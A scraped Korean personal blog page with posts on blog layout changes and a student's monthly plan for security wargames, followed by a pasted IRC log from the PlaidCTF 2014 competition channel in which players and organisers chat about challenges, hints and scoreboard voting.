반응형

모양새를 좀 바꿨습니다. 그래봤자 사이즈 바꾼게 전부지만..

바탕에 당근이 안보이네여.. 후.......

당근...

아 뭐 다음에 다시그리죠 뭐.. 하하..


그리고 대문 이미지에 링크가 안됐었는데 뭐 어떻게 했는지는 모르겠지만 고쳤습니다. 이제 대문 이미지를 클릭하면 홈으로 돌아갈 수 있게 됩니다! 하지만 사이즈 조절에 fail해서 사이즈를 줄이려고 스샷으로 (화질따위 버려야죠..) 가로 사이즈를 줄여 스샷을 찍어 다시 대문 이미지로 올렸었는데도 어째 고쳐지지가 않습니다? 암튼 대문이미지는 안고쳐지고 화질은 점점 꾸려져서 저것도 다시만들어야함..


안고쳐짐

다음에 다시만들죠 뭐

화질만꾸려짐ㅋㅋ


+)대문이미지 다시만들었어여 근데 사이즈 제대로 맟춰서 그려도 망함 왜저러죠 하 뭐 이상한거 건드렸나봐여

반응형

'KOREAN > 뻘글' 카테고리의 다른 글

20150215 오늘의 뻘글  (0) 2015.02.15
20141213 오늘의 뻘글(글이 매우 두서없음)  (3) 2014.12.13
이번달에 할 것  (2) 2014.06.09
pCTF2014 irc log  (2) 2014.04.13
제 프로필 사진 어떤가요  (0) 2014.03.05
반응형

예전에 이 글을 매 달 올리려고 했는데 한번 올리고 끝났던것 같다

이번달은 우선 15일까지 기말고사다

내일부터 기말이다


우선 기말이 끝나면 그 다음주부터 방학특강 한시부터 여섯시까지다

그러면 하루가 아침-방학특강-저녁 이렇게 셋으로 나눠지게 되는데 아침에는 내가 아마 11시쯤에 매일 일어날테니까 2시간정도가 있고 저녁은 6시부터 12시까지니까 6시간이 있다


그렇다면 시간배분을 해야할텐데

아침에 컴퓨터공부를 하고 저녁에 학교공부, 게임을 하는 생각을 해보고 있다

물론 지켜질지가 의문이지만 =_=;; 그래도 생에 처음으로 지켜보려 한다

그냥 요즘 내가 너무 의지도 없고 해내는 것도 없어서 이대로가다간 그냥 인생망칠것같다

남과 내 실력을 비교하면서 내 진도가 느린것에 대해 자괴감도 들었었는데 그냥 천천히 내 페이스로 가는게 맞는 것 같다. 서두르려 하니까 오히려 듬성듬성하게되더라.. 그래도 진짜 스트레스 많이받는다 그냥 비교하는게 버릇이 되버린 것 같다 이러면 안되는데 그것도 좀 줄이려 노력해야겠다


아무튼, 다시 본론으로 돌아가자면,


11시 기상

11시 10분까지 밥을 먹고

12시 45분까지 컴퓨터 공부를 한다.

6시에 학원에서 돌아와서 간식을 먹고

8시(8시 반..!)까지 게임을 하고

한시간 독서하고 나머지는 각 날에 해당하는 학교공부를 할 생각이다.


학교공부는 수학 문제집을 지금 밀린걸 다풀어야되는데 9권은 된다... 다풀어야지ㅠㅠ 불어도 진짜 문법 많이공부해야된다 미친 기말 에세이를 그따구로 쓰다니 내가 미쳤지 으아ㅏ아아


월별 목표는 내가 안그래도 세우려 했는데 어디에 필요하게 됬다. 계획을 안짜는 성격이었는데 한번 짜보니 필요한 것 같다 진짜 한번 쓰니 다 지키지는 않더라도 해야할 게 보이니까 시간을 덜 낭비하는 것 같다

이게 바로 마인드가 성숙해진다는 것인가..!(뻘소리입니다 무시해주세요)


<6월>  컴퓨터공부는 이번달까지 ROP, LOB를 한문제(두문제, febp풀어놨는데 로그를 블로그에 임시저장해두니 날아가버렸다. febp안그래도 아직 확고하게 개념이 안잡혀서 걱정하고 있었는데 공부하라고 컴퓨터갓님이 날려주셨나보다)를 풀고 블로그에 정리를 하고, 그냥 요즘 컴공을 기말때문에 못해서 완전히 컴퓨터 용어는 아니지만 그래도 가끔 보이는 Proof of Concept에 대해서도 정리해보고 싶다


<7월>  다음달동안에는 LOB를 끝낼(수있었으면 좋겠다 희망사항임 진짜 근데 끝내고싶다 레알 근데 어려울거가틈)거고, 라잇업을 정리해야겠다. 더블릿도 지금 54문젠가? 풀어놨는데 역시 프로그래밍은 오랜만에 하면 그냥 너무 재밌어서, 복잡한게 풀리면 더 좋아서 지금 이상태로는 3문제? 어려운거 3문제정도 더 풀고 싶다. 그리고.. 하고싶었던게 있었는데, 기억이 안난다!(ㅋ) 어.... overthewire도 병행해서 풀어야겠다.


<8월>  그리고 대망의 8월!

..을 쓰려 했으나 방금 기억난게 하.... 여름방학동안 가족여행가네 아나 여행 일정도 모르는데 7월에 하기로 했던거 걍 7~8월에 걸쳐서 해야겠다.. 

해공예도 다시 읽어봐야되고 ROP좋은 문서들 있던데 그것도 다 읽어보고싶고(근데 영어울렁증 올라오려함) 특히 메모리가 아직도 왔다갔다하는데(개멍청) 종이에 그려가면서 달고나님의 문서도 다시 읽어봐야겠따. 이젠 처음 읽었을때보다 갈피는 잡았으니 필요한걸 많이 배울 수 있겠지


근데 다시 읽어보니까 진짜 쓸데없는소리 많이하는성격이다 수다떠는거 좋아하는 성격인데 다 반영된다! (혼잣말 잘함)

아 시험 걱정이다 부들ㄷ부들

반응형

'KOREAN > 뻘글' 카테고리의 다른 글

20141213 오늘의 뻘글(글이 매우 두서없음)  (3) 2014.12.13
블로그 모양새  (0) 2014.06.29
pCTF2014 irc log  (2) 2014.04.13
제 프로필 사진 어떤가요  (0) 2014.03.05
[3월목표] 잡다  (0) 2014.02.24
반응형

Hey guys, if you guys came through because of a recon of Fuzyll, (:D) there's nothing to look for on this page. Glhf on your CTFs!

-----------April 12th------------------------------------------------------
[22:46] == tokki [d9a5709e@gateway/web/freenode/ip.217.165.112.158] has joined #pctf
[22:46] == sorin_ [5e34c7a9@gateway/web/freenode/ip.94.52.199.169] has joined #pctf
[22:47] == zzoru [8ff8f941@gateway/web/freenode/ip.143.248.249.65] has quit [Ping timeout: 240 seconds]
[22:48] <s3Rious> Ymgve: I've done it. Now I have a headache....
[22:48] <tokki> hudak is giving me cancer
[22:48] == Luffy [47cfa62b@gateway/web/freenode/ip.71.207.166.43] has quit [Quit: Page closed]
[22:48] == s_kunk [~s_kunk@ivr94-9-88-170-234-229.fbx.proxad.net] has joined #pctf
[22:48] == sorin [5e34c7a9@gateway/web/freenode/ip.94.52.199.169] has quit [Ping timeout: 240 seconds]
[22:48] <kanghee> I'm starting to hate white cats
[22:49] <sorin_> i also have issues there kanghee
[22:49] == x7r0n [x7r0n@117.254.106.13] has joined #pctf
[22:50] <tokki> lol
[22:51] == DaramG [8ff8eb18@gateway/web/cgi-irc/kiwiirc.com/ip.143.248.235.24] has quit [Quit: http://www.kiwiirc.com/ - A hand crafted IRC client]
[22:52] <fal7Q> :)
[22:52] <player10> executable
[22:54] == Tokage-Kira [uid15875@gateway/web/irccloud.com/x-qbloircajjrvxuam] has quit [Quit: Connection closed for inactivity]
[22:54] == Yerer [~sean@pool-108-16-202-97.phlapa.fios.verizon.net] has joined #pctf
[22:55] <x7r0n> any ops for for100 ? or what is the pattern for it ?
[22:57] <corpille> so stega much cool
[22:57] == halfvollemelk [589f763c@gateway/web/freenode/ip.88.159.118.60] has joined #pctf
[22:58] <+tylerni7> x7r0n: I mean
[22:58] <+tylerni7> it's stego
[22:58] <+tylerni7> find hidden flage
[22:58] <+tylerni7> very hidden
[22:58] <x7r0n> i got it
[22:58] <+tylerni7>   much flage
[22:58] <player10> much secret?
[22:58] <+tylerni7>   so stego
[22:58] <x7r0n> can i pm u
[22:58] == lkwpeter [~florian@p5DDCF126.dip0.t-ipconnect.de] has joined #pctf
[22:58] <+tylerni7> x7r0n: sue
[22:58] <x7r0n> i mean i feel its the correct..can i ?
[22:58] <x7r0n> ok :-)
[22:59] == oej [~The@174-22-93-25.sxfl.qwest.net] has quit [Ping timeout: 258 seconds]
[22:59] == HotShot [43a49c58@gateway/web/cgi-irc/kiwiirc.com/ip.67.164.156.88] has quit [Quit: http://www.kiwiirc.com/ - A hand crafted IRC client]
[23:00] == eZpl0it [~ezpl0it@x2f444fa.dyn.telefonica.de] has joined #pctf
[23:00] <eZpl0it> :>
[23:00] == subsnake [~subsnake@91.148.120.210] has quit [Ping timeout: 240 seconds]
[23:01] <Gynvael> tylerni7: https://107.21.133.9/ from re300 is up?
[23:01] <+tylerni7> Gynvael: it's getting fixed..
[23:02] <Gynvael> ack
[23:02] <+tylerni7> sorry
[23:02] == nvs [6adc406e@gateway/web/cgi-irc/kiwiirc.com/ip.106.220.64.110] has joined #pctf
[23:02] <Gynvael> no worries, just making sure it's not an IP backdoor, but a TCP one
[23:02] <Gynvael> ;D
[23:02] <Guest76035> So for tiffany, if I am running outside a debugger, should I be seeing ptrace errors?
[23:02] == Mawat [~Mawat@97e4e410.skybroadband.com] has joined #pctf
[23:02] <+tylerni7> Gynvael: xP
[23:02] == razvanc [~razvanc@141.85.225.214] has quit [Remote host closed the connection]
[23:02] <+tylerni7> backdoor? whatever could you mean :O
[23:03] == gameredan [~gameredan@112.215.64.111] has joined #pctf
[23:03] == Stean [~Stean@95-89-213-155-dynip.superkabel.de] has joined #pctf
[23:03] <jduck> Gynvael: did you try dirbuster?
[23:03] <Gynvael> tylerni7: nevermind, I mixed up the tasks
[23:03] == gameredan has changed nick to Guest24706
[23:03] <Gynvael> jduck: hey man
[23:03] <jduck> ;D
[23:03] <+tylerni7> ;)
[23:03] <+tylerni7> hey jduck
[23:04] <Gynvael> jduck: yeah! it couldn't connect on 1 server, to I started it on amazon 100 machines
[23:04] <+tylerni7> lol
[23:04] <Gynvael> jduck: just to be sure I get my fair share of cpu
[23:04] == netsurf3 [~netsurf3@cpc10-stav16-2-0-cust832.aztw.cable.virginm.net] has joined #pctf
[23:04] <+tylerni7> when we give source, it really makes me sad when people use dirbuster
[23:04] <jduck> LOL
[23:04] == olkis [4e087709@gateway/web/freenode/ip.78.8.119.9] has joined #pctf
[23:04] <Gynvael> hahahaha
[23:04] <Gynvael> lolz
[23:04] <robbje> people will always use dirbuster :>
[23:04] <+tylerni7> we should really set up some IDS or something that auto detects dirbuster
[23:04] <robbje> dirbusters gonna dirbust!
[23:04] <jduck> they were hoping for http://challenge.server/key.txt
[23:05] <mongo12> ban all dirbusters!
[23:05] <mongo12> and then hang them
[23:05] <mongo12> \o/
[23:05] <+tylerni7> yeah, we block IPs when stuff DoS's
[23:05] <foundation> tylerni7: it could be a research paper, IDS that detect only lame attacks and lets in sophisticated ones!
[23:05] <Gynvael> tylerni7: reply with fake flags on common dirbuster queries
[23:05] <Gynvael> haha
[23:06] <+tylerni7> foundation: haha
[23:07] <mongo12> haha
[23:07] == InternalCumBustI [43a49c58@gateway/web/cgi-irc/kiwiirc.com/ip.67.164.156.88] has joined #pctf
[23:07] <jduck> Gynvael: nooooo, they they will try to submit them all!
[23:07] <mongo12> in most cases, you could probably do, more than X reqs in Y secs, iptables drop for 5min
[23:07] <mongo12> should stop it pretty fast
[23:08] <Pitr_> Time to introduce fake flags with penalty-points
[23:08] <jduck> :)
[23:08] == fnstenv [~fnstenv@176.227.202.120] has quit [Ping timeout: 264 seconds]
[23:08] == wa1ker [6adc5e91@gateway/web/cgi-irc/kiwiirc.com/ip.106.220.94.145] has joined #pctf
[23:08] == Cailou [~Cailou@109.236.80.211] has quit [Ping timeout: 240 seconds]
[23:08] <foundation> you know what i'm gonna do for the next time, i'll make a fake stegano tool and put it on SF and github , and pwn people that use random tools to try to solve stupid stegano challenges
[23:08] <wa1ker> !misc
[23:09] == Adran [adran@botters/staff/adran] has joined #pctf
[23:09] <foundation> who opens a stegano challenge , anyway?
[23:09] == Cailou [~Cailou@23.94.16.69] has joined #pctf
[23:09] == knc [310f825d@gateway/web/freenode/ip.49.15.130.93] has joined #pctf
[23:09] <Gynvael> jduck: that's the idea!
[23:09] <Gynvael> jduck: and each flag, -10 points!
[23:09] <Gynvael> ;D
[23:09] <Gynvael> flags of shame or sth
[23:10] <+tylerni7> Gynvael: xD
[23:10] <+tylerni7> we've discussed things like this >.<
[23:10] <Gynvael> hah ;)
[23:10] <Gynvael> awesome
[23:10] == c0ax [~c0ax@109-93-2-34.dynamic.isp.telekom.rs] has quit [Remote host closed the connection]
[23:10] <InternalCumBustI> im so confused on doge_stego I know where the message is but i have no clue how to get it
[23:11] == fal7Q [~root@pc121.riednet.wh.tu-darmstadt.de] has left #pctf []
[23:11] == nvs [6adc406e@gateway/web/cgi-irc/kiwiirc.com/ip.106.220.64.110] has quit [Quit: http://www.kiwiirc.com/ - A hand crafted IRC client]
[23:11] <player10> copy paste
[23:12] == j0e__ [~The@174-22-95-184.sxfl.qwest.net] has joined #pctf
[23:12] <InternalCumBustI> copy paste what?
[23:12] <ShortKidd> ohhey heartbleed worked the first time.
[23:13] <player10> copy paste the flag
[23:13] <+pctf_scoreboard> gcc server is up. thank you for you patience and flying PPPair.
[23:13] <+tylerni7> heh
[23:14] <Gynvael> thanks
[23:14] <mouth`> argh whatscat! we've exploited you why you no give flag??
[23:15] <ShortKidd> HAve you asked nicely?
[23:15] <+tylerni7> mouth`: you can pm me perhaps
[23:15] <+tylerni7> you probably didn't exploit it hard enough
[23:15] == fritz[] [~unk@93-138-136-136.adsl.net.t-com.hr] has joined #pctf
[23:15] <+tylerni7> :)
[23:16] <player10> did you try turning your exploit off and on again?
[23:16] <ShortKidd> Try asking nicely. I know I wouldn't do something for you if you exploited me.
[23:16] <halfvollemelk> any tips for rendezvous challenge?
[23:16] <halfvollemelk> i'm stuck
[23:16] == ir|na [~i@swarm.cs.pub.ro] has quit [Quit: leaving]
[23:17] == awesie [~awesie@freenode/sponsor/awesie] has joined #pctf
[23:17] <n00bz> who i can pm about web300?
[23:17] == mode/#pctf [+v awesie] by ChanServ
[23:17] <mouth`> tried asking the t-rex nicely yeah
[23:17] <Adran> trex cat must be repaired :>
[23:17] == nullProtectorate [~nullProte@pool-71-191-221-210.washdc.fios.verizon.net] has joined #pctf
[23:17] == trelgak [~trelgak@71.202.135.122] has quit [Read error: Connection reset by peer]
[23:18] == olkis [4e087709@gateway/web/freenode/ip.78.8.119.9] has quit [Quit: Page closed]
[23:18] == checkmayte [~anonymous@mang-2-res.dynamic.ucsd.edu] has quit [Quit: checkmayte]
[23:18] == TMT [~taktaz_m2@5.127.0.191] has joined #pctf
[23:19] <iZsh> the number of PM is increasing it seems
[23:19] <+tylerni7> ?
[23:20] <Mawat> The Chandler relay servers, is there just 1?
[23:20] <+tylerni7> Mawat: there are multiple
[23:20] <Mawat> So I can use any?
[23:20] <+tylerni7> houqp: is the authority though (it's his problem)
[23:20] <+houqp> yes
[23:20] <+houqp> any of them will work
[23:21] == drzoid [~drzoid@128.198.97.43] has quit [Ping timeout: 240 seconds]
[23:23] == pez [~pez@p5481D7A7.dip0.t-ipconnect.de] has quit [Quit: WeeChat 0.4.3]
[23:23] == bobsteam [1817f0b6@gateway/web/freenode/ip.24.23.240.182] has quit [Ping timeout: 240 seconds]
[23:24] == wooyaggo [~wooyaggo@182.218.50.138] has quit [Quit: wooyaggo]
[23:24] == Stean [~Stean@95-89-213-155-dynip.superkabel.de] has quit [Quit: Leaving.]
[23:24] == pctf533 [46b9d762@gateway/web/freenode/ip.70.185.215.98] has joined #pctf
[23:24] <asmoday> I cannot get shit on this
[23:25] <+houqp> have you tried poop?
[23:25] <Anyny0> x)
[23:25] <tokki> lol
[23:26] == DKay [uid11914@gateway/web/irccloud.com/x-hwffhwtrovwugdvc] has joined #pctf
[23:26] <asmoday> whatacat failed to email, mtpox got admin.php failed, heartbleed none of my scripts dump anything, paris ollydbg just execptions, pyjail just get registers no flags
[23:26] <asmoday> time to apply at mcdonalds or walmart
[23:27] <pctf533> lol
[23:27] == copyleft_ [~scott@d192-24-117-65.col.wideopenwest.com] has quit [Ping timeout: 258 seconds]
[23:28] == Anyny0 [6babd56d@gateway/web/cgi-irc/kiwiirc.com/ip.107.171.213.109] has quit [Quit: http://www.kiwiirc.com/ - A hand crafted IRC client]
[23:28] <Brooklynt_Overfl> Everyone needs a plan B. There is always stripping.
[23:28] <nullProtectorate> lol
[23:28] <x_x> Just solved my first stego challenge. Walmart avoided. Faith in self, restored.
[23:28] <x_x> >_>
[23:28] <x_x> <_<
[23:28] <asmoday> I have a not so large member, so perhaps nursing home stripping
[23:29] <+tylerni7> lol
[23:29] <+gbarboza> Awk
[23:29] tylerni7 almost spat water on his screen
[23:29] <asmoday> like bad grandpa deal
[23:29] == s3Rious [~gitsmsg@176.92.133.238] has quit [Quit: s3Rious]
[23:31] <asmoday> anybody want to get addicted to drugs instead of these crazy challenges
[23:32] == TMT [~taktaz_m2@5.127.0.191] has quit [Ping timeout: 240 seconds]
[23:32] == kurtisebear [sid28273@gateway/web/irccloud.com/x-ettntmmjyjvsqznk] has joined #pctf
[23:32] == n00b13 [~n00b13@unaffiliated/nitsua] has joined #pctf
[23:33] == n00bz [~1234@host185-107-dynamic.20-79-r.retail.telecomitalia.it] has quit [Remote host closed the connection]
[23:33] <+gbarboza> asmoday: Why not both?
[23:33] == ari_ [~ari_@dy869-1-82-228-24-60.fbx.proxad.net] has joined #pctf
[23:34] == bobsteam [1817f0b6@gateway/web/freenode/ip.24.23.240.182] has joined #pctf
[23:34] <asmoday> this is too stressful for multitasking
[23:35] == xhs [5e88c674@gateway/web/freenode/ip.94.136.198.116] has joined #pctf
[23:38] == j0f [~j0f@unaffiliated/j0f] has quit [Ping timeout: 240 seconds]
[23:39] == wa1ker [6adc5e91@gateway/web/cgi-irc/kiwiirc.com/ip.106.220.94.145] has quit [Quit: http://www.kiwiirc.com/ - A hand crafted IRC client]
[23:39] <x7r0n> 2012 pwnies
[23:40] <x7r0n> guess u shld have made 2014
[23:40] <x7r0n> :-p
[23:41] == Mawat [~Mawat@97e4e410.skybroadband.com] has quit [Ping timeout: 240 seconds]
[23:41] == anyny0 [6babd56d@gateway/web/cgi-irc/kiwiirc.com/ip.107.171.213.109] has joined #pctf
[23:43] == ubuntor [~ubuntor@ip98-169-88-223.dc.dc.cox.net] has joined #pctf
[23:43] == Mawat [~Mawat@97e4e410.skybroadband.com] has joined #pctf
[23:45] == subsnake [~subsnake@91.148.120.210] has joined #pctf
[23:45] == Tapyroe___ [~chatzilla@5.151.196.159] has joined #pctf
[23:45] == Tapyroe___ [~chatzilla@5.151.196.159] has quit [Client Quit]
[23:46] == Tapyroe__ [~chatzilla@5.151.196.159] has quit [Read error: Connection reset by peer]
[23:46] <a13k> is rendezvous working as expected?
[23:46] <anyny0> Probably
[23:46] <+tylerni7> a13k: almost certainly
[23:46] <+houqp> a13k: you know the solution?
[23:46] <anyny0> Not being able to connect is part of it
[23:46] <a13k> tylerni7: thanks.
[23:46] <a13k> houqp: maybe
[23:47] <+houqp> ok pm me please :)
[23:47] <a13k> still some things to try
[23:47] <a13k> will pm if they don't work
[23:47] <anyny0> Any hints for WhatsCat? I really have no clue on where might the exploit be
[23:47] == ebeip90 [~user@162.243.211.14] has quit [Quit: Lost terminal]
[23:47] <cybertech> so i am trying to find out the twenty cypto
[23:47] <cybertech> i found the key
[23:47] <cybertech> but its not the flag
[23:47] <cybertech> but than i found a poem
[23:48] <anyny0> The flag might be in the poem
[23:48] <+tylerni7> maybe specifically towards the end
[23:48] <a13k> houqp: issue is on my end
[23:48] <+mserrano> lol
[23:49] == x7r0n [x7r0n@117.254.106.13] has quit [Quit: Leaving]
[23:49] <halfvollemelk> tips for rendezvous? i could rly use one
[23:49] <+houqp> nice :)
[23:49] <a13k> houqp: never hurts to ask though :-p  I've ran/cometed in enough ctf's to know to ask if things are working as expected before beating my head against the desk
[23:49] <+mserrano> Good job hellman! there goes wheee
[23:50] <+houqp> a13k: yeah, rendezvous behaviours like it's down most of the time, which is sad :(
[23:51] <+tylerni7> nice mslc :)
[23:51] <+houqp> halfvollemelk: scroll back
[23:51] <Cimmi> cybertech: look at the end
[23:51] <hellman> open more crypto, i can't look at rsa :/
[23:51] <+tylerni7> hahah
[23:51] <+mserrano> hellman: lol why not
[23:51] <+tylerni7> why not xD
[23:52] <a13k> houqp: I kinda figured that.  seemed obvious from the initial text from the challange.  the issue I had was some configs
[23:52] <anyny0> Could someone give me a tiny lead on whatsCat?
[23:52] <cybertech> cimmi i am
[23:52] <cybertech> i dont get it
[23:52] <cybertech> hmm
[23:53] == Mawat [~Mawat@97e4e410.skybroadband.com] has quit [Ping timeout: 240 seconds]
[23:53] == Mawat [~Mawat@97e4e410.skybroadband.com] has joined #pctf
[23:53] == reanimus [~animus@96-32-143-144.dhcp.gwnt.ga.charter.com] has joined #pctf
[23:53] <+mserrano> voting is open
[23:53] <+mserrano> I would recommend voting for chance
[23:53] <+mserrano> you've gotta get something this time :P
[23:53] == ebeip90 [~user@162.243.211.14] has joined #pctf
[23:53] <+tylerni7> that's how randomness works, sure
[23:53] <+tylerni7> -_-
[23:54] <+mserrano> yup
[23:54] <+mserrano> it is
[23:54] <x_x> Yeah, twenty is giving me a headache, too. Found the flag, but it doesn't accept.
[23:54] <+tylerni7> x_x: pm me/
[23:54] <+mserrano> x_x: pm me what you think the flag is
[23:54] <+mserrano> or tylerni7
[23:55] <asmoday> all in all am learning a bit, I really hate the plague though, now that move is ruined
[23:55] <+tylerni7> heh
[23:55] <Cimmi> The flag should be readable as a sentence
[23:55] <arthurdent> asmoday: hold your tongue sir
[23:56] <arthurdent> that movie is a classic
[23:56] <corewar> it can never be ruined
[23:56] <asmoday> classic pain the arse
[23:56] <asmoday> that gcc though
[23:57] <+pctf_scoreboard> that movie is the best
[23:57] <asmoday> plague could go back and become Dades dad
[23:57] == virodoran [uid2011@gateway/web/irccloud.com/x-nkhkmgpqfkcsbbie] has quit [Quit: Connection closed for inactivity]
[23:57] == xhs [5e88c674@gateway/web/freenode/ip.94.136.198.116] has quit [Ping timeout: 240 seconds]
[23:57] <arthurdent> wat
[23:58] <asmoday> then move through time and impregnate kate then really screw things up for Zero Cool
[23:58] <+tylerni7> lol
[23:59] <asmoday> after that Penn aka Hal can do some magic with Teller who was in the movie as Gibson Mainframe
[00:00] <asmoday> oh Phiber if you only knew
[00:00] == badeec [~badeec@2a02:810d:640:7bc:6a5d:43ff:fe80:ce1a] has quit [Quit: Leaving]
[00:02] == paraxor [~aoepxnpe@unaffiliated/prazial] has joined #pctf
[00:03] == amohn9 [~andrew@cumm111-0b02-acm2-dhcp152.bu.edu] has quit [Remote host closed the connection]
[00:03] == rvpersie [~darkwonde@pool-100-1-142-100.nwrknj.fios.verizon.net] has joined #pctf
[00:04] == XPenguin [~XPenguin@145.255.3.82] has left #pctf []
[00:04] <arthurdent> now that you mention it, gibson mainframe never spoke
[00:04] == ghostpixel [~quaid@hsv.pikewerks.com] has joined #pctf
[00:04] <asmoday> right haha
[00:04] <asmoday> and Penn is never far from Teller
[00:04] <asmoday> its like his liver, little and full of stress
[00:05] == Bijan-E [~bijan-e@unaffiliated/bijan-e] has quit [Ping timeout: 245 seconds]
[00:05] <ghostpixel> i'm working on reekee, but i can't seem to find the file location where the site is being hosted from...
[00:05] == Mawat [~Mawat@97e4e410.skybroadband.com] has quit [Ping timeout: 245 seconds]
[00:06] == poppopret [~poppopret@130.65.0.2] has joined #pctf
[00:06] <asmoday> I am surprised finding flight 370 wasnt a flag on this....
[00:06] <asmoday> too soon, too soon....
[00:06] == Mawat [~Mawat@97e4e410.skybroadband.com] has joined #pctf
[00:07] == knc [310f825d@gateway/web/freenode/ip.49.15.130.93] has quit [Ping timeout: 240 seconds]
[00:07] == phiber_ [~bleh@1.Red-88-3-171.dynamicIP.rima-tde.net] has quit [Ping timeout: 245 seconds]
[00:08] == ghostpixel [~quaid@hsv.pikewerks.com] has quit [Client Quit]
[00:09] <n00b13> what is the input key length for web 150
[00:09] <+cai_> heh we have over 1000 registered teams now :p (780 of them have at least 1 point)
[00:09] == chunderstruck1 [~daniel@184-98-244-58.phnx.qwest.net] has quit [Quit: Leaving.]
[00:10] == knc [6a4cc70d@gateway/web/freenode/ip.106.76.199.13] has joined #pctf
[00:12] == jarCrack [~jarCrack@24-134-71-89-dynip.superkabel.de] has quit [Quit: Verlassend]
[00:13] <+tylerni7> ooo dragon sector close to 2nd place
[00:13] <+cai_> voting ends in 5 minutes
[00:13] == fritz[] [~unk@93-138-136-136.adsl.net.t-com.hr] has quit [Ping timeout: 245 seconds]
[00:14] <+mserrano> oh man DS
[00:14] <+mserrano> goin' hard
[00:14] == rvpersie [~darkwonde@pool-100-1-142-100.nwrknj.fios.verizon.net] has quit [Remote host closed the connection]
[00:14] == nullProtectorate [~nullProte@pool-71-191-221-210.washdc.fios.verizon.net] has quit [Remote host closed the connection]
[00:14] <+cai_> 1 point difference :p
[00:14] <+cai_> now in 2nd
[00:14] <+cai_> nice
[00:15] <+mserrano> now you just have to catch 0xffa ;)
[00:16] == dedet [d42931c1@gateway/web/freenode/ip.212.41.49.193] has quit [Ping timeout: 240 seconds]
[00:16] <tokki> OH SHIT
[00:16] <tokki> I GO IN AND THE CHRONOSPHERE IS ON
[00:16] <tokki> DANGGGGGG
[00:16] == nullProtectorate [~nullProte@pool-71-191-221-210.washdc.fios.verizon.net] has joined #pctf
[00:16] <+tylerni7> zomg, teh chronospherez
[00:17] <+tylerni7> but yeah voting time :)
[00:17] <tokki> wait im still confused tho, if you vote 1, does it skip the opened challs?
[00:17] <+tylerni7> yes
[00:17] <n00b13> any hints for web150?
[00:18] <tokki> WE NEED ANOTHER CHANCE VOTEZ 1
[00:18] <+mserrano> uh
[00:18] <+cai_> you mean 3
[00:18] <+mserrano> you mean vote 3
[00:18] == rev1550 [~lorenza@74.123.248.143] has joined #pctf
[00:18] <tokki> k
[00:18] <tokki> 3
[00:18] == Bijan-E [~bijan-e@unaffiliated/bijan-e] has joined #pctf
[00:18] <tokki> i thought skipping as like skipping the tiles for opened challs
[00:18] <+mserrano> you are currently at gcc
[00:18] <tokki> nvm
[00:18] <+mserrano> lol
[00:18] <tokki> lol
[00:19] <+cai_> voting ends soon
[00:19] == naam [~naam@83.141.77.130] has joined #pctf
[00:19] <tokki> *gasp* *gaspgasp*
[00:19] <n00b13> is it just me or should web150 be worth more
[00:19] <+cai_> damn
[00:19] <+cai_> no luck on chance card
[00:19] <+cai_> new voting starts
[00:19] <+cai_> you have 5 mins :)
[00:19] <tokki> DANGGGGGG
[00:20] == ubuntor [~ubuntor@ip98-169-88-223.dc.dc.cox.net] has quit [Remote host closed the connection]
[00:20] == Cailou [~Cailou@23.94.16.69] has quit [Ping timeout: 245 seconds]
[00:20] <tokki> wait no i dont think i get the chronosphere thing but i guess its okay
[00:20] <corpille> crap no luck for today
[00:20] <tokki> ikr
[00:20] <+houqp> 15:50:31  +tylerni7 | that's how randomness works, sure
[00:20] <asmoday> I am playing pokemon
[00:20] <rev1550> is anyone else having problems download doge_stege
[00:21] <tokki> go pikachu!!!!!!!!!
[00:21] == rvpersie_ [~darkwonde@pool-100-1-142-100.nwrknj.fios.verizon.net] has joined #pctf
[00:21] == phiber_ [~bleh@206.Red-83-38-173.dynamicIP.rima-tde.net] has joined #pctf
[00:21] tokki throws hamster
[00:21] <+cai_> tokki: what don't you get it?
[00:21] <tokki> k so you guys said that the voting skips opened challs
[00:21] <+cai_> the hatched tile is where the current position is
[00:21] <+cai_> yes it does
[00:21] <tokki> so if you vote like 1 right now,
[00:22] <+cai_> it will open pwnables 150
[00:22] <tokki> where do you go
[00:22] <+cai_> at the end of the present board
[00:22] <tokki> OH I GET IT
[00:22] <+cai_> :)
[00:22] <tokki> OH
[00:22] <+mserrano> 1 -> pwnable 150; 2 -> reversing 250; 3 -> pwnable 200; 4 -> forensics 350; 5 -> crypto 250; 6 -> misc 10
[00:22] <tokki> sry for my idioticness
[00:22] <+mserrano> pls misc 10
[00:22] <+mserrano> or
[00:22] <+mserrano> forensics 350
[00:22] <tokki> pls misc 10
[00:22] <+mserrano> or
[00:22] <tokki> pls
[00:22] <corpille> misc 10
[00:22] <+mserrano> pwnable 150
[00:22] <tokki> pls
[00:22] <+cai_> lol
[00:23] <anyny0> Mis 10 :D
[00:23] <tokki> pls misc
[00:23] <tokki> ily guys
[00:23] == alexwebr [~alexwebr@162.243.13.193] has joined #pctf
[00:23] <+mserrano> no
[00:23] <+cai_> what about 2-part forensics 350?
[00:23] <tokki> pls
[00:23] <+mserrano> pls pwnable 150
[00:23] <+mserrano> or 2-part forensics
[00:23] <tokki> pls misc 10
[00:23] <Hertz_> pls nothing
[00:23] <tokki> pls
[00:23] <tokki> lol
[00:23] <+mserrano> Hertz_: lo
[00:23] <+mserrano> l
[00:24] <tokki> i aint got time fo dat
[00:24] <asmoday> is the point to just do pokemon forever
[00:24] <tokki> pokemon!
[00:24] == Luffy [47cfa62b@gateway/web/freenode/ip.71.207.166.43] has joined #pctf
[00:24] <asmoday> its stuck on chaning art i think
[00:24] == naam [~naam@83.141.77.130] has quit [Read error: Connection reset by peer]
[00:24] <asmoday> changing
[00:24] <asmoday> ha i think i broke it
[00:24] <+cai_> misc10 is opened
[00:24] <+cai_> lol
[00:24] <+cai_> you guys win
[00:24] == naam [~naam@83.141.77.130] has joined #pctf
[00:25] <+mserrano> lol
[00:25] <tokki> ILYyYYYYY
[00:25] <tokki> ♥︎
[00:25] <+mserrano> lol
[00:25] <+cai_> time to watch people submitting wrong number
[00:25] <+cai_> lol
[00:25] <+mserrano> everyone is guessing the wrong thing
[00:25] <tokki> lol
[00:25] <+mserrano> like literally everyone
[00:25] <tokki> lol
[00:25] <subsnake> will there be any hints soon?
[00:25] <tokki> lemme join ;)
[00:26] <tokki> NOT TILL THE CHANCE
[00:26] <+mserrano> YEAH BS LABS
[00:26] <+cai_> grats BS Labs
[00:26] <+mserrano> FIRST BLOOD
[00:26] <tokki> THE FREAKING CHANCE
[00:26] <tokki> 300G
[00:26] <+cai_> voting is up again lol
[00:26] <+mserrano> yay MSLC
[00:26] <+mserrano> and H4x0rPsch0rr
[00:26] <+mserrano> there goes the breakthrough
[00:26] <anyny0> Hmm
[00:26] <+cai_> except there is no bonus point
[00:26] <+cai_> lol
